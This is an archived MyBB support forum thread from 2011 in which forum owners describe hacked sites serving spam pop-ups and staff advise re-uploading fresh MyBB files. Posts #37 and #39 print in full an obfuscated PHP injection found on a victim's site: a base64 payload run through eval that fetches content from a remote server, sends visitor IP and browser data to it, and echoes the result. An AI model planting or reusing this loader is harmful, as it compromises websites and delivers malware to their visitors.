MyBB Community Forums Community Archive Archived Forums Archived Development and Support MyBB 1.6 1.6 Security Management and Support v
Virus in MYBB site help ASAP

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Threaded Mode
Virus in MYBB site help ASAP
JukEboX Offline
Posts: 57
Threads: 18
Joined: May 2011
Reputation: 0
#31
2011-10-13, 04:49 PM
(2011-10-13, 03:34 AM)pavemen Wrote: you have a problem much like the other users with malicious code injected into your site. You need to clean your templates. Can you post your showthread_newreply_closed template here?

Here is my template for requested. Looks clean to me.

<a href="newreply.php?tid={$tid}"><img src="{$theme['imglangdir']}/closed.png" alt="{$lang->thread_closed}" title="{$lang->thread_closed}" /></a>&nbsp;
Find
pavemen Offline

Former Staff
Posts: 4,846
Threads: 180
Joined: May 2007
Reputation: 254
#32
2011-10-13, 04:54 PM
have you made the edits posted in the blog about this vulnerability? have you run file verification to see what has been edited?
Lost interest, sold my sites, will browse here once in a while. It's been fun.
Find
hon0r Offline
Posts: 16
Threads: 1
Joined: Oct 2011
Reputation: 0
#33
2011-10-13, 08:36 PM
(2011-10-13, 04:54 PM)pavemen Wrote: have you made the edits posted in the blog about this vulnerability? have you run file verification to see what has been edited?

I did run verification my host, dreamhost told me to use the instant backup. I backuped it up to like 1 week. I couldn't do the 1 hour to 1 day.
Find
pavemen Offline

Former Staff
Posts: 4,846
Threads: 180
Joined: May 2007
Reputation: 254
#34
2011-10-13, 08:40 PM
as I asked before, have you made the edits posted in the blog about this vulnerability?
Lost interest, sold my sites, will browse here once in a while. It's been fun.
Find
Dragonzsoul Offline
Posts: 604
Threads: 48
Joined: Aug 2010
Reputation: 2
#35
2011-10-13, 08:40 PM
that is not virus on something not serious protect your safe domain security more highly!
Find
hon0r Offline
Posts: 16
Threads: 1
Joined: Oct 2011
Reputation: 0
#36
2011-10-13, 09:44 PM (This post was last modified: 2011-10-13, 11:01 PM by hon0r.)
yes i have .
getting this error over and over.
http://i.imgur.com/nO4H3.png
Find
JukEboX Offline
Posts: 57
Threads: 18
Joined: May 2011
Reputation: 0
#37
2011-10-14, 12:07 AM
(2011-10-13, 08:40 PM)pavemen Wrote: as I asked before, have you made the edits posted in the blog about this vulnerability?

I found this on one of my pages and its at the end of my php tags. Its still happening in my forum. Can you help me please?

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
[/code]
Find
Shad0w Offline
Posts: 127
Threads: 23
Joined: Mar 2009
Reputation: 1
#38
2011-10-14, 12:10 AM (This post was last modified: 2011-10-14, 12:12 AM by Shad0w.)
try this:
http://community.mybb.com/thread-103695.html it worked for me.
c:localhost
Find
pavemen Offline

Former Staff
Posts: 4,846
Threads: 180
Joined: May 2007
Reputation: 254
#39
2011-10-14, 12:12 AM (This post was last modified: 2011-10-14, 12:13 AM by pavemen.)
(2011-10-13, 09:44 PM)hon0r Wrote: yes i have .
getting this error over and over.
http://i.imgur.com/nO4H3.png

if you have not edited those files, then you need to download the latest MyBB package (don't use an old one you already have, get a new one) and then upload the files again. You should not have to change anything and this assumes you are already running 1.6.4
(2011-10-14, 12:07 AM)JukEboX Wrote:
(2011-10-13, 08:40 PM)pavemen Wrote: as I asked before, have you made the edits posted in the blog about this vulnerability?

I found this on one of my pages and its at the end of my php tags. Its still happening in my forum. Can you help me please?

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
[/code]

just do like i posted above, get a new download of MyBB and then upload the new files.
Lost interest, sold my sites, will browse here once in a while. It's been fun.
Find
Soldier of Silence Offline
Posts: 1
Threads: 0
Joined: Sep 2010
Reputation: 0
#40
2011-10-14, 02:43 AM (This post was last modified: 2011-10-14, 02:45 AM by Soldier of Silence.)
(2011-10-14, 12:07 AM)JukEboX Wrote: as I asked before, have you made the edits posted in the blog about this vulnerability?

My members are having the same issue, pop-ups leading to spammy sites that are giving them viruses. We found out it's coming from somewhere in Vietnam and I banned the IP address, but it's still popping up. I tried to do what the blog post said, but I'm not sure where I can find that piece of code? My host actually coded and set the board up for me, because technical is not my strong point, but I really want to fix this, just need someone to point me in the right direction.

Thanks!
Find


Forum Jump:


Users browsing this thread: 1 Guest(s)